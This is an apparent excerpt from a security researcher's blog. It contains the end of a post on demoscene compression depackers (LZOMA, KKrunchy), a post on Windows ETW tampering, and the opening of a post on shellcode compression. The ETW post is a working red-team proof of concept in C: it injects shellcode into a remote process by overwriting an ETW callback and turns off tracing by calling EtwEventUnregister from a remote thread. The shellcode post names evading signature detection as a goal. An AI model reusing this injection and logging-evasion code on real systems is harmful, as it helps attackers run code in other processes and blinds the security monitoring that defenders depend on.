            top = (((top << 3) + top) >> 3);
          }
          if(res < top) break;
          
          ofs -= top;
          total += top;
          top <<= 1;
          cf = get_bit(&c);
          res = (res << 1) + cf;
        }
        ofs += res + 1;
        // long length?
        if(ofs >= 5400) len++;
        // huge length?
        if(ofs >= 0x060000) len++;
        // negate
        ofs =- ofs;
      }
      
      if(get_bit(&c)) {
        len += 2;
        res = 0;
        for(;;) { 
          cf = get_bit(&c);
          res = (res << 1) + cf;
          if(!get_bit(&c)) break;
          res++;
        }
        len += res;
      } else {
        cf = get_bit(&c); 
        len += cf;
      }
      ptr = out + ofs;
      while(--len) *out++ = *ptr++;
    }
}

The assembly code doesn’t transfer that well on to x86. It does, however, avoid having to use lots of RAM, which is a plus.

lzoma_depack:
_lzoma_depack:
    pushad                   ; save all registers
    lea    esi, [esp+32+4]
    lodsd
    xchg   edi, eax          ; edi = outbuf
    lodsd
    xchg   ebp, eax          ; ebp = inlen
    add    ebp, edi          ; ebp += out
    lodsd
    xchg   esi, eax          ; esi = inbuf
    pushad                   ; save esi, edi and ebp
    call   init_getbit
get_bit:
    add    eax, eax          ; c->w <<= 1
    jnz    exit_getbit       ; if(c->w == 0)
    lodsd                    ; x = *(uint32_t*)c->src;
    adc    eax, eax          ; c->w = (x << 1) | 1;
exit_getbit:
    ret                      ; return x >> 31;
init_getbit:
    pop    ebp               ; ebp = &get_bit
    mov    eax, 1 << 31      ; c->w = 1 << 31
    cdq                      ; ofs = -1
    movsb                    ; *out++ = *src++;
    xor    ecx, ecx          ; len = 0
    jmp    main_loop
copy_byte:
    movsb                    ; *out++ = *c.src++;
    mov    cl, 2             ; len = 2
main_loop:
    xor    ebx, ebx          ; res = 0
    
    ; while(out < end)
    cmp    edi, [esp+pushad_t._ebp]
    jnb    lzoma_exit
    
    ; for(;;) {
    call   ebp               ; cf = get_bit(&c);
    jnc    copy_byte         ; if(cf) break;
    
    ; unpack lz
    jecxz  skip_lz           ; if(len) {
    call   ebp               ;   cf = get_bit(&c);
skip_lz:                     ; }
    ; carry?
    jnc    use_last_offset   ; if(cf) {
    mov    cl, 3+2           ;   len = 3
    pushad                   ;   
    ; total = out - (uint8_t*)outbuf
    sub    edi, [esp+32+pushad_t._edi] 
    ; top = ((total <= 400000) ? 60 : 50;
    mov    cl, 50
    cmp    edi, 400000
    ja     skip_upd
    add    cl, 10
skip_upd:
    xor    ebp, ebp          ; ofs = 0
    xor    edx, edx          ; x = 256
    inc    dh
    mov    bl, byte[esi]     ; res = *c.src++
    inc    esi
find_loop:                   ; for(;;) {
    add    edx, edx          ;   x += x;
    ; if(x >= (total + top)) {
    push   edi               ; save total
    add    edi, ecx          ; edi = total + top
    cmp    edx, edi          ; cf = (x - (total + top)) 
    pop    edi               ; restore total
    jb     upd_len3          ; jump if x is < (total + top)
    
    sub    edx, edi          ; x -= total;
    cmp    ebx, edx          ; if(res >= x) {
    jb     upd_len2          ; jump if res < x
    
    ; cf = get_bit(&c);
    call   dword[esp+pushad_t._ebp]
    adc    ebx, ebx          ; res = (res << 1) + cf;
    sub    ebx, edx          ; res -= x;
    jmp    upd_len2
upd_len3:
    ; magic?
    ; if(x & (0x002FFE00 << 1)) {
    test   edx, (0x002FFE00 << 1)
    jz     upd_len4
    
    ; top = (((top << 3) + top) >> 3);
    lea    ecx, [ecx+ecx*8]
    shr    ecx, 3
upd_len4:
    cmp    ebx, ecx          ; if(res < top) break;
    jb     upd_len2
    
    sub    ebp, ecx          ; ofs -= top
    add    edi, ecx          ; total += top
    add    ecx, ecx          ; top <<= 1
    
    ; cf = get_bit(&c);
    call   dword[esp+pushad_t._ebp]
    
    ; res = (res << 1) + cf;
    adc    ebx, ebx
    jmp    find_loop
upd_len2:
    ; ofs = (ofs + res + 1);
    lea    ebp, [ebp + ebx + 1]

    ; if(ofs >= 5400) len++;
    cmp    ebp, 5400
    sbb    dword[esp+pushad_t._ecx], 0
    
    ; if(ofs >= 0x060000) len++;
    cmp    ebp, 0x060000
    sbb    dword[esp+pushad_t._ecx], 0
    
    neg    ebp               ; ofs = -ofs;
    
    mov    [esp+pushad_t._edx], ebp ; save ofs in edx
    mov    [esp+pushad_t._esi], esi
    mov    [esp+pushad_t._eax], eax
    popad                    ; restore registers
use_last_offset:
    call   ebp               ; if(get_bit(&c)) {
    jnc    check_two
    
    add    ecx, 2            ; len += 2
upd_len:                     ; for(res=0;;res++) {
    call   ebp               ; cf = get_bit(&c);
    adc    ebx, ebx          ; res = (res << 1) + cf;
    
    call   ebp               ; if(!get_bit(&c)) break;
    jnc    upd_lenx
    
    inc    ebx               ; res++;
    jmp    upd_len
upd_lenx:
    add    ecx, ebx          ; len += res
    jmp    copy_bytes
check_two:                   ; } else {
    call   ebp               ;   cf = get_bit();
    adc    ecx, ebx          ;   len += cf
copy_bytes:                  ; }
    push   esi               ; save c.src pointer
    lea    esi, [edi + edx]  ; ptr = out + ofs
    dec    ecx
    ; while(--len) *out++ = *ptr++;
    rep    movsb
    pop    esi               ; restore c.src
    jmp    main_loop
lzoma_exit:
    popad                    ; free()
    popad                    ; restore registers
    ret

12.7 KKrunchy

Designed by Fabian Giesen for the demo group, Farbrausch, KKrunchy comprises two algorithms. The first, developed between 2003 and 2005, is an LZ77 variant with an arithmetic coder published in 2006. The second algorithm developed between 2006 and 2008, borrows ideas from PAQ7 and was published in 2011. Both are slow at compression but acceptable for demo productions and are compact for decompression. Fabian describes both in more detail here, including the “secret ingredient” that can improve ratios of 64K intros by up to 10%. In 2011, Farbrausch members published source code for their demo productions made between 2001-2011, including both compressors. A 32-Bit x86 decoder is already available from Fabian. There appears to be a buffer overflow in the compressor that goes unnoticed without address sanitizer. Here’s an alternate version of the simple depacker used as a reference.

#ifdef linux
// gcc
#define REV(x) __builtin_bswap32(x)
#else
// msvc
#define REV(x) _byteswap_ulong(x)
#endif

typedef struct _fr_state {
    const uint8_t *src;
    // range decoder values
    uint32_t val, len, pbs[803];
} fr_state;

// decode a bit using range decoder
static int DB(
  fr_state *s, int idx, uint32_t flag) 
{
    uint32_t a, b, c, d, e;

    a = s->pbs[idx];
    b = (s->len >> 11) * a;
    c = (s->val >= b);
    d = -c; e = c-1;
    s->len = (d & s->len) | (e & b);
    a = (d & a) | (e & -a + 2048);
    a >>= (5 - flag);
    s->pbs[idx] += (a ^ d) + c;
    d &= b;
    s->val -= d; s->len -= d;
    a = (s->len >> 24);
    a = a == 0 ? -1 : 0;
    b = (a & 0xFF) & *s->src;
    d = -a;
    s->src += d;
    s->val = (s->val << (d << 3)) | b;
    s->len = (s->len << (d << 3));
    return c;
}

// decode tree
static int DT(
  fr_state *s, int p, int bits) 
{
    int c;
    
    for(c=1; c<bits;) {
      c = (c+c) + DB(s, p + c, bits==256);
    }
    return c - bits;
}

// decode gamma
static int DG(fr_state *s, int flag) {
    int     v, x = 1;
    uint8_t c = 1;
    
    v = (-flag & (547 - 291)) + 291;
    
    do {
      c = (c+c) + DB(s, v+c, 0);
      x = (x+x) + DB(s, v+c, 0);
      c = (c+c) + (x & 1);
    } while(c & 2);
    
    return x;
}

uint32_t fr_depack(
  void *outbuf, 
  const void *inbuf) 
{
    int      tmp, i, ofs, len, LWM;
    uint8_t  *ptr, *out = (uint8_t*)outbuf;
    fr_state s;
     
    s.src  = (const uint8_t*)inbuf;
    s.len  = ~0;
    s.val  = REV(*(uint32_t*)s.src);
    s.src += 4;
    
    for(i=0; i<803; i++) s.pbs[i] = 1024;

    for(;;) {
      LWM = 0;
      // decode literal
      *out++ = DT(&s, 35, 256);
    fr_read_bit:
      if(!DB(&s, LWM, 0)) continue;
      // decode match
      len = 0;
      // use previous offset?
      if(LWM || !DB(&s, 2, 0)) {
        ofs = DG(&s, 0);
        if(!ofs) break;
        
        len  = 2;
        ofs  = ((ofs - 2) << 4); 
        tmp  = ((ofs != 0 ? -1 : 0) & 16) + 3;
        ofs += DT(&s, tmp, 16) + 1;
        
        len -= (ofs < 2048);
        len -= (ofs < 96);
      }
      LWM  = 1;
      len += DG(&s, 1);
      ptr  = out - ofs;
      
      while(len--) *out++ = *ptr++;
      goto fr_read_bit;
    }
    return out - (uint8_t*)outbuf;
}

13. Results

The following table, while ordered by ratio, is NOT a rank order and shouldn’t be interpreted that way. It wouldn’t be fair to judge the algorithms based on my criteria, that is: lightweight decompressor, high compression ratio, open source. The ratios are based on compressing a 1MB PE file for Windows without any additional trickery.

Algorithm RAM (Bytes) ROM (Bytes) Ratio
LZ77 0 54 32%
ZX7 Mini 0 67 36%
LZSS 0 69 40%
LZ4 0 80 43%
ULZ 0 124 44%
LZE 0 97 45%
ZX7 0 81 46%
MegaLZ 0 117 46%
BriefLZ 0 92 46%
LZSA1 0 96 46%
LZSA2 0 187 50%
NRV2b 0 115 51%
LZOMA 0 238 54%
Shrinkler 4096 235 55%
KKrunchy 3212 639 (compiler generated) 55%
LZMA 16384 1265 (compiler generated) 58%

14. Summary

One could surely write a book about compression algorithms used by the Demoscene. And it’s safe to say I’ve only scraped the surface on this subject. For example, there is no analysis of compression and decompression speed of implementations for the x86 or other architectures. My primary concern at the moment is in the compression ratio and code size.

15. Acknowledgements

A number of people helped directly or indirectly with this post.

  • Tim Bell for LZB and information about the Stac Electronics lawsuit.
  • Blueberry for optimization tips and fixing my initial 68K translation of Shrinkler.
  • Qkumba for fixing x86 translation and 6502 depackers.
  • Trixter for 8088 depackers.
  • Introspec for Z80 depackers and impressive knowledge of LZ variations.
  • Emmanuel Marty for aPUltra, LZSA, and helping with x86 decoder for aPLib.

16. Further Research

To save you time locating information about some of the topics discussed in this post, I’ve included some links to get you started.

16.1 Documentaries and Interviews

16.2 Websites, Blogs and Forums

16.3 Demoscene Productions

This is not a “best of” list or what my favorites are. It’s mainly from some youtube recommendations and please don’t take offense If I didn’t include your demo. Contact me if you feel I’ve missed any.

16.4 Tools

16.5 Other Compression Algorithms

The following table, while ordered by ratio, is NOT a rank order and shouldn’t be interpreted that way. It wouldn’t be fair to judge the algorithms based on my criteria, which is a lightweight decompressor, high compression ratio, open-source. The compression ratios are from compressing a 1MB PE file for Windows.

Good (25-39%)

Library / API / Algorithm Ratio Link
PPP 27% https://tools.ietf.org/html/rfc1978
JQCoding 27% https://encode.su/threads/2157-Looking-for-a-super-simple-decompressor?p=43099&viewfull=1#post43099
LZJB 28% https://github.com/nemequ/lzjb
LZRW1 31% http://ross.net/compression/lzrw1.html
LZ48 31% http://www.cpcwiki.eu/forum/programming/lz48-cruncherdecruncher/
LZ77 32% https://github.com/andyherbert/lz1
LZW 33% https://github.com/vapier/ncompress
LZP1 34% http://www.hugi.scene.org/online/coding/hugi%2012%20-%20colzp.htm
Kitty 34% https://encode.su/threads/2174-Kitty-file-compressor-(Super-small-compressor)
LZ49 35% http://www.cpcwiki.eu/forum/programming/lz48-cruncherdecruncher/
LZ4X 36% https://github.com/encode84/lz4x
QuickLZ 36% http://www.quicklz.com/
ZX7mini 36% https://github.com/antoniovillena/zx7mini
RtlDecompressBuffer (LZNT1) 36% Windows OS
Decompress (Xpress) 37% Windows OS.

Very Good (40-49%)

Library / API / Algorithm Ratio Link
LZSS 40% https://github.com/kieselsteini/lzss
LZF 40% https://encode.su/threads/1819-LZF-Optimized-LZF-compressor
LZM 41% https://github.com/r-lyeh/stdarc.c
RtlDecompressBuffer (Xpress) 43% Windows OS
BLZ4 43% https://github.com/jibsen/blz4
LZ4Ultra 43% https://github.com/emmanuel-marty/lz4ultra
ULZ 44% https://github.com/encode84/ulz
BitBuster 44% https://www.teambomba.net/bombaman/downloadd26a.html
LZE 45% http://gorry.haun.org/pw/?lze
Decompress (Xpress Huffman) 45% Windows OS
ZX7 45% http://www.worldofspectrum.org/infoseekid.cgi?id=0027996
LZMAT 45% http://www.matcode.com/lzmat.htm
CRUSH 45% https://sourceforge.net/projects/crush/
Hrust 46% https://github.com/specke/ohc
MegaLZ 46% http://os4depot.net/index.php?function=showfile&file=development/cross/megalz.lha
LZSA1 46% https://github.com/emmanuel-marty/lzsa
BriefLZ 46% https://github.com/jibsen/brieflz
apUltra 47% https://github.com/emmanuel-marty/apultra
Pletter5 47% http://www.xl2s.tk/
Pucrunch 48% https://github.com/mist64/pucrunch
SR2 48% http://mattmahoney.net/dc/#sr2

Excellent (50% >)

Library / API / Algorithm Ratio Link
BCRUSH 50% https://github.com/jibsen/bcrush
LZSA2 50% https://github.com/emmanuel-marty/lzsa
RtlDecompressBufferEx (Xpress Huffman) 50% Windows OS
Decompress (MSZip) 51% Windows OS
Exomizer 51% https://bitbucket.org/magli143/exomizer/wiki/Home
aPLib 51% http://ibsensoftware.com/products_aPLib.html
JCALG1 52% https://bitsum.com/portfolio/jcalg1/
NRV2B 52% http://www.oberhumer.com/opensource/ucl/
BALZ 53% https://sourceforge.net/projects/balz/
Decompress (LZMS) 54% Windows OS
LZOMA 54% https://github.com/alef78/lzoma
KKrunchy 55% https://github.com/farbrausch/fr_public
Shrinkler 55% https://github.com/askeksa/Shrinkler
NLZM 55% https://github.com/nauful/NLZM
BCM 55% https://github.com/encode84/bcm
D3DDecompressShaders (DXT/BC) 57% Windows OS
Packfire 57% http://neural.untergrund.net/
LZMA 58% https://www.7-zip.org/sdk.html
PAQ8F 70% http://mattmahoney.net/dc/paq.html

Posted in compression, encryption, iot, linux, optimization, programming, shellcode, windows | Tagged , , , , , , , , , , , , , , , , , , , , , , | Leave a comment

Another method of bypassing ETW and Process Injection via ETW registration entries.

Contents

  1. Introduction
  2. Registering Providers
  3. Locating the Registration Table
  4. Parsing the Registration Table
  5. Code Redirection
  6. Disable Tracing
  7. Further Research

1. Introduction

This post briefly describes some techniques used by Red Teams to disrupt detection of malicious activity by the Event Tracing facility for Windows. It’s relatively easy to find information about registered ETW providers in memory and use it to disable tracing or perform code redirection. Since 2012, wincheck provides an option to list ETW registrations, so what’s discussed here isn’t all that new. Rather than explain how ETW works and the purpose of it, please refer to a list of links here. For this post, I took inspiration from Hiding your .NET – ETW by Adam Chester that includes a PoC for EtwEventWrite. There’s also a PoC called TamperETW, by Cornelis de Plaa. A PoC to accompany this post can be found here.

2. Registering Providers

At a high-level, providers register using the advapi32!EventRegister API, which is usually forwarded to ntdll!EtwEventRegister. This API validates arguments and forwards them to ntdll!EtwNotificationRegister. The caller provides a unique GUID that normally represents a well-known provider on the system, an optional callback function and an optional callback context.

Registration handles are the memory address of an entry combined with table index shifted left by 48-bits. This may be used later with EventUnregister to disable tracing. The main functions of interest to us are those responsible for creating registration entries and storing them in memory. ntdll!EtwpAllocateRegistration tells us the size of the structure is 256 bytes. Functions that read and write entries tell us what most of the fields are used for.

typedef struct _ETW_USER_REG_ENTRY {
    RTL_BALANCED_NODE   RegList;           // List of registration entries
    ULONG64             Padding1;
    GUID                ProviderId;        // GUID to identify Provider
    PETWENABLECALLBACK  Callback;          // Callback function executed in response to NtControlTrace
    PVOID               CallbackContext;   // Optional context
    SRWLOCK             RegLock;           // 
    SRWLOCK             NodeLock;          // 
    HANDLE              Thread;            // Handle of thread for callback
    HANDLE              ReplyHandle;       // Used to communicate with the kernel via NtTraceEvent
    USHORT              RegIndex;          // Index in EtwpRegistrationTable
    USHORT              RegType;           // 14th bit indicates a private
    ULONG64             Unknown[19];
} ETW_USER_REG_ENTRY, *PETW_USER_REG_ENTRY;

ntdll!EtwpInsertRegistration tells us where all the entries are stored. For Windows 10, they can be found in a global variable called ntdll!EtwpRegistrationTable.

3. Locating the Registration Table

A number of functions reference it, but none are public.

  • EtwpRemoveRegistrationFromTable
  • EtwpGetNextRegistration
  • EtwpFindRegistration
  • EtwpInsertRegistration

Since we know the type of structures to look for in memory, a good old brute force search of the .data section in ntdll.dll is enough to find it.

LPVOID etw_get_table_va(VOID) {
    LPVOID                m, va = NULL;
    PIMAGE_DOS_HEADER     dos;
    PIMAGE_NT_HEADERS     nt;
    PIMAGE_SECTION_HEADER sh;
    DWORD                 i, cnt;
    PULONG_PTR            ds;
    PRTL_RB_TREE          rbt;
    PETW_USER_REG_ENTRY   re;
    
    m   = GetModuleHandle(L"ntdll.dll");
    dos = (PIMAGE_DOS_HEADER)m;  
    nt  = RVA2VA(PIMAGE_NT_HEADERS, m, dos->e_lfanew);  
    sh  = (PIMAGE_SECTION_HEADER)((LPBYTE)&nt->OptionalHeader + 
            nt->FileHeader.SizeOfOptionalHeader);
    
    // locate the .data segment, save VA and number of pointers
    for(i=0; i<nt->FileHeader.NumberOfSections; i++) {
      if(*(PDWORD)sh[i].Name == *(PDWORD)".data") {
        ds  = RVA2VA(PULONG_PTR, m, sh[i].VirtualAddress);
        cnt = sh[i].Misc.VirtualSize / sizeof(ULONG_PTR);
        break;
      }
    }
    
    // For each pointer minus one
    for(i=0; i<cnt - 1; i++) {
      rbt = (PRTL_RB_TREE)&ds[i];
      // Skip pointers that aren't heap memory
      if(!IsHeapPtr(rbt->Root)) continue;
      
      // It might be the registration table.
      // Check if the callback is code
      re = (PETW_USER_REG_ENTRY)rbt->Root;
      if(!IsCodePtr(re->Callback)) continue;
      
      // Save the virtual address and exit loop
      va = &ds[i];
      break;
    }
    return va;
}

4. Parsing the Registration Table

ETW Dump can display information about each ETW provider in the registration table of one or more processes. The name of a provider (with exception to private providers) is obtained using ITraceDataProvider::get_DisplayName. This method uses the Trace Data Helper API which internally queries WMI.

Node        : 00000267F0961D00
GUID        : {E13C0D23-CCBC-4E12-931B-D9CC2EEE27E4} (.NET Common Language Runtime)
Description : Microsoft .NET Runtime Common Language Runtime - WorkStation
Callback    : 00007FFC7AB4B5D0 : clr!McGenControlCallbackV2
Context     : 00007FFC7B0B3130 : clr!MICROSOFT_WINDOWS_DOTNETRUNTIME_PROVIDER_Context
Index       : 108
Reg Handle  : 006C0267F0961D00

5. Code Redirection

The Callback function for a provider is invoked in request by the kernel to enable or disable tracing. For the CLR, the relevant function is clr!McGenControlCallbackV2. Code redirection is achieved by simply replacing the callback address with the address of a new callback. Of course, it must use the same prototype, otherwise the host process will crash once the callback finishes executing. We can invoke a new callback using the StartTrace and EnableTraceEx API, although there may be a simpler way via NtTraceControl.

// inject shellcode into process using ETW registration entry
BOOL etw_inject(DWORD pid, PWCHAR path, PWCHAR prov) {
    RTL_RB_TREE             tree;
    PVOID                   etw, pdata, cs, callback;
    HANDLE                  hp;
    SIZE_T                  rd, wr;
    ETW_USER_REG_ENTRY      re;
    PRTL_BALANCED_NODE      node;
    OLECHAR                 id[40];
    TRACEHANDLE             ht;
    DWORD                   plen, bufferSize;
    PWCHAR                  name;
    PEVENT_TRACE_PROPERTIES prop;
    BOOL                    status = FALSE;
    const wchar_t           etwname[]=L"etw_injection\0";
    
    if(path == NULL) return FALSE;
    
    // try read shellcode into memory
    plen = readpic(path, &pdata);
    if(plen == 0) { 
      wprintf(L"ERROR: Unable to read shellcode from %s\n", path); 
      return FALSE; 
    }
    
    // try obtain the VA of ETW registration table
    etw = etw_get_table_va();
    
    if(etw == NULL) {
      wprintf(L"ERROR: Unable to obtain address of ETW Registration Table.\n");
      return FALSE;
    }
    
    printf("*********************************************\n");
    printf("EtwpRegistrationTable for %i found at %p\n", pid, etw);  
    
    // try open target process
    hp = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    
    if(hp == NULL) {
      xstrerror(L"OpenProcess(%ld)", pid);
      return FALSE;
    }
    
    // use (Microsoft-Windows-User-Diagnostic) unless specified
    
    node = etw_get_reg(
      hp, 
      etw, 
      prov != NULL ? prov : L"{305FC87B-002A-5E26-D297-60223012CA9C}", 
      &re);
    
    if(node != NULL) {
      // convert GUID to string and display name
      StringFromGUID2(&re.ProviderId, id, sizeof(id));
      name = etw_id2name(id);
        
      wprintf(L"Address of remote node  : %p\n", (PVOID)node);
      wprintf(L"Using %s (%s)\n", id, name);
      
      // allocate memory for shellcode
      cs = VirtualAllocEx(
        hp, NULL, plen, 
        MEM_COMMIT | MEM_RESERVE, 
        PAGE_EXECUTE_READWRITE);
        
      if(cs != NULL) {
        wprintf(L"Address of old callback : %p\n", re.Callback);
        wprintf(L"Address of new callback : %p\n", cs);
        
        // write shellcode
        WriteProcessMemory(hp, cs, pdata, plen, &wr);
          
        // initialize trace
        bufferSize = sizeof(EVENT_TRACE_PROPERTIES) + 
                     sizeof(etwname) + 2;

        prop = (EVENT_TRACE_PROPERTIES*)LocalAlloc(LPTR, bufferSize);
        prop->Wnode.BufferSize    = bufferSize;
        prop->Wnode.ClientContext = 2;
        prop->Wnode.Flags         = WNODE_FLAG_TRACED_GUID;
        prop->LogFileMode         = EVENT_TRACE_REAL_TIME_MODE;
        prop->LogFileNameOffset   = 0;
        prop->LoggerNameOffset    = sizeof(EVENT_TRACE_PROPERTIES);
        
        if(StartTrace(&ht, etwname, prop) == ERROR_SUCCESS) {
          // save callback
          callback = re.Callback;
          re.Callback = cs;
          
          // overwrite existing entry with shellcode address
          WriteProcessMemory(hp, 
            (PBYTE)node + offsetof(ETW_USER_REG_ENTRY, Callback), 
            &cs, sizeof(ULONG_PTR), &wr);
          
          // trigger execution of shellcode by enabling trace
          if(EnableTraceEx(
            &re.ProviderId, NULL, ht,
            1, TRACE_LEVEL_VERBOSE, 
            (1 << 16), 0, 0, NULL) == ERROR_SUCCESS) 
          {
            status = TRUE;
          }
          
          // restore callback
          WriteProcessMemory(hp, 
            (PBYTE)node + offsetof(ETW_USER_REG_ENTRY, Callback), 
            &callback, sizeof(ULONG_PTR), &wr);

          // disable tracing
          ControlTrace(ht, etwname, prop, EVENT_TRACE_CONTROL_STOP);
        } else {
          xstrerror(L"StartTrace");
        }
        LocalFree(prop);
        VirtualFreeEx(hp, cs, 0, MEM_DECOMMIT | MEM_RELEASE);
      }        
    } else {
      wprintf(L"ERROR: Unable to get registration entry.\n");
    }
    CloseHandle(hp);
    return status;
}

6. Disable Tracing

If you decide to examine clr!McGenControlCallbackV2 in more detail, you’ll see that it changes values in the callback context to enable or disable event tracing. For CLR, the following structure and function are used. Again, this may be defined differently for different versions of the CLR.

typedef struct _MCGEN_TRACE_CONTEXT {
    TRACEHANDLE      RegistrationHandle;
    TRACEHANDLE      Logger;
    ULONGLONG        MatchAnyKeyword;
    ULONGLONG        MatchAllKeyword;
    ULONG            Flags;
    ULONG            IsEnabled;
    UCHAR            Level;
    UCHAR            Reserve;
    USHORT           EnableBitsCount;
    PULONG           EnableBitMask;
    const ULONGLONG* EnableKeyWords;
    const UCHAR*     EnableLevel;
} MCGEN_TRACE_CONTEXT, *PMCGEN_TRACE_CONTEXT;

void McGenControlCallbackV2(
  LPCGUID              SourceId, 
  ULONG                IsEnabled, 
  UCHAR                Level, 
  ULONGLONG            MatchAnyKeyword, 
  ULONGLONG            MatchAllKeyword, 
  PVOID                FilterData, 
  PMCGEN_TRACE_CONTEXT CallbackContext) 
{
  int cnt;
  
  // if we have a context
  if(CallbackContext) {
    // and control code is not zero
    if(IsEnabled) {
      // enable tracing?
      if(IsEnabled == EVENT_CONTROL_CODE_ENABLE_PROVIDER) {
        // set the context
        CallbackContext->MatchAnyKeyword = MatchAnyKeyword;
        CallbackContext->MatchAllKeyword = MatchAllKeyword;
        CallbackContext->Level           = Level;
        CallbackContext->IsEnabled       = 1;
        
        // ...other code omitted...
      }
    } else {
      // disable tracing
      CallbackContext->IsEnabled       = 0;
      CallbackContext->Level           = 0;
      CallbackContext->MatchAnyKeyword = 0;
      CallbackContext->MatchAllKeyword = 0;
      
      if(CallbackContext->EnableBitsCount > 0) {
        
        ZeroMemory(CallbackContext->EnableBitMask,
          4 * ((CallbackContext->EnableBitsCount - 1) / 32 + 1));
      }
    }
    EtwCallback(
      SourceId, IsEnabled, Level, 
      MatchAnyKeyword, MatchAllKeyword, 
      FilterData, CallbackContext);
  }
}

There are a number of options to disable CLR logging that don’t require patching code.

  • Invoke McGenControlCallbackV2 using EVENT_CONTROL_CODE_DISABLE_PROVIDER.
  • Directly modify the MCGEN_TRACE_CONTEXT and ETW registration structures to prevent further logging.
  • Invoke EventUnregister passing in the registration handle.

The simplest way is passing the registration handle to ntdll!EtwEventUnregister. The following is just a PoC.

BOOL etw_disable(
    HANDLE             hp,
    PRTL_BALANCED_NODE node,
    USHORT             index) 
{
    HMODULE               m;
    HANDLE                ht;
    RtlCreateUserThread_t pRtlCreateUserThread;
    CLIENT_ID             cid;
    NTSTATUS              nt=~0UL;
    REGHANDLE             RegHandle;
    EventUnregister_t     pEtwEventUnregister;
    ULONG                 Result;
    
    // resolve address of API for creating new thread
    m = GetModuleHandle(L"ntdll.dll");
    pRtlCreateUserThread = (RtlCreateUserThread_t)
        GetProcAddress(m, "RtlCreateUserThread");
    
    // create registration handle    
    RegHandle           = (REGHANDLE)((ULONG64)node | (ULONG64)index << 48);
    pEtwEventUnregister = (EventUnregister_t)GetProcAddress(m, "EtwEventUnregister");

    // execute payload in remote process
    printf("  [ Executing EventUnregister in remote process.\n");
    nt = pRtlCreateUserThread(hp, NULL, FALSE, 0, NULL, 
      NULL, pEtwEventUnregister, (PVOID)RegHandle, &ht, &cid);

    printf("  [ NTSTATUS is %lx\n", nt);
    WaitForSingleObject(ht, INFINITE);
    
    // read result of EtwEventUnregister
    GetExitCodeThread(ht, &Result);
    CloseHandle(ht);
    
    SetLastError(Result);
    
    if(Result != ERROR_SUCCESS) {
      xstrerror(L"etw_disable");
      return FALSE;
    }
    disabled_cnt++; 
    return TRUE;
}

7. Further Research

I may have missed articles/tools on ETW. Feel free to email me with the details.

Posted in etw, process injection, redteam, security, shellcode, windows | Tagged , , , , | 1 Comment

Shellcode: Data Compression

Introduction

This post examines data compression algorithms suitable for position-independent codes and assumes you’re already familiar with the concept and purpose of data compression. For those of you curious to know more about the science, or information theory, read Data Compression Explained by Matt Mahoney. For historical perspective, read History of Lossless Data Compression Algorithms. Charles Bloom has a great blog on the subject that goes way over my head. For questions and discussions, Encode’s Forum is popular among experts and should be able to help with any queries you have.

For shellcode, algorithms based on the following conditions are considered:

  1. Compact decompressor.
  2. Good compression ratio.
  3. Portable across operating systems and architectures.
  4. Difficult to detect by signature.
  5. Unencumbered by patents and licensing.

Meeting the requirements isn’t that easy. Search for “lightweight compression algorithms” and you’ll soon find recommendations for algorithms that aren’t compact at all. It’s not an issue on machines with 1TB hard drives of course. It’s a problem for resource-constrained environments like microcontrollers and wireless sensors. The best algorithms are usually optimized for speed. They contain arrays and constants that allow them to be easily identified with signature-based tools.

Algorithms that are compact might have suboptimal compression ratios. The compressor component is closed source or restricted by licensing. There is light at the end of the tunnel, however, thanks primarily to the efforts of those designing executable compression. First, we look at those algorithms and then what Windows API can be used as an alternative. There are open source libraries designed for interoperability that support Windows compression on other platforms like Linux.

Table of contents

  1. Executable Compression
  2. Windows NT Layer DLL
  3. Windows Compression API
  4. Windows Packaging API
  5. Windows Imaging API
  6. Direct3D HLSL Compiler
  7. Windows-internal libarchive library
  8. LibreSSL Cryptography Library
  9. Windows.Storage.Compression
  10. Windows Undocumented API
  11. Summary

1. Executable Compression

The first tool known to compress executables and save disk space was Realia SpaceMaker published sometime in 1982 by Robert Dewar. The first virus known to use compression in its infection routine was Cruncher published in June 1993. The author of Cruncher used routines from the disk reduction utility for DOS called DIET. Later on, many different viruses utilized compression as part of their infection routine to reduce the size of infected files, presumably to help evade detection longer. Although completely unrelated to shellcode, I decided to look at e-zines from twenty years ago when there was a lot of interest in using lightweight compression algorithms.

The following list of viruses used compression back in the late 90s/early 00s. It’s not an extensive list, as I only searched the more popular e-zines like 29A and Xine by iKX.

  • Redemption, by Jacky Qwerty/29A
  • Inca, Hybris, by Vecna/29A
  • Aldebaran, by Bozo/iKX
  • Legacy, Thorin, Rhapsody, Forever, by Billy Belcebu/iKX
  • BeGemot, HIV, Vulcano, Benny, Milennium, by Benny/29A
  • Junkmail, Junkhtmail, by roy g biv/29A/defjam

The following compression engines were examined. A 1MB EXE file was used as the raw data and not all of them were tested.

BCE that appeared in 29a#4 was disappointing with only an 8% compression ratio. BNCE that appeared in DCA#1 was no better at 9%, although the decompressor is only 54 bytes. The decompressor for LSCE is 25 bytes, but the compressor simply encodes repeated sequences of zero and nothing else. JQCoding has a ~20% compression ratio while LZCE provides the best at 36%. With exception to the last two mentioned, I was unable to find anything in the e-zines with a good compression ratio. They were super tiny, but also super eh..inefficient. Worth a mention is KITTY, by snowcat.

While I could be wrong, the earliest example of compression being used to unpack shellcode can be found in a generator written by Z0MBiE/29A in 2004. (shown in figure 1). NRV compression algorithms, similar to what’s used in UPX, were re-purposed to decompress the shellcode (see freenrv2 for more details).

Figure 1: Shellcode constructor by Z0MBiE/29A

UPX is a very popular tool for executable compression based on UCL. Included with the source is a PE packer example called UCLpack (thanks Peter) which is ideal for shellcode, too. aPLib also provides good compression ratio and the decompressor doesn’t contain lots of unique constants that would assist in detection by signature. The problem is that the compressor isn’t open source and requires linking with static or dynamic libraries compiled by the author. Thankfully, an open-source implementation by Emmanuel Marty is available and this is also ideal for shellcode.

Other libraries worth mentioning that I didn’t think were entirely suitable are Tiny Inflate and uzlib. The rest of this post focuses on compression provided by various Windows API.

2. Windows NT Layer DLL

Used by the Sofacy group to decompress a payload, RtlDecompressBuffer is also popular for PE Packers and in-memory execution. rtlcompress.c demonstrates using the API.

  • Compression

Obtain the size of the workspace required for compression via the RtlGetCompressionWorkSpaceSize API. Allocate memory for the compressed data and pass both memory buffer and the raw data to RtlCompressBuffer. The following example in C demonstrates this.

DWORD CompressBuffer(DWORD engine, LPVOID inbuf, DWORD inlen, HANDLE outfile) {      
    ULONG                            wspace, fspace;
    SIZE_T                           outlen;
    DWORD                            len;
    NTSTATUS                         nts;
    PVOID                            ws, outbuf;
    HMODULE                          m;
    RtlGetCompressionWorkSpaceSize_t RtlGetCompressionWorkSpaceSize;
    RtlCompressBuffer_t              RtlCompressBuffer;
      
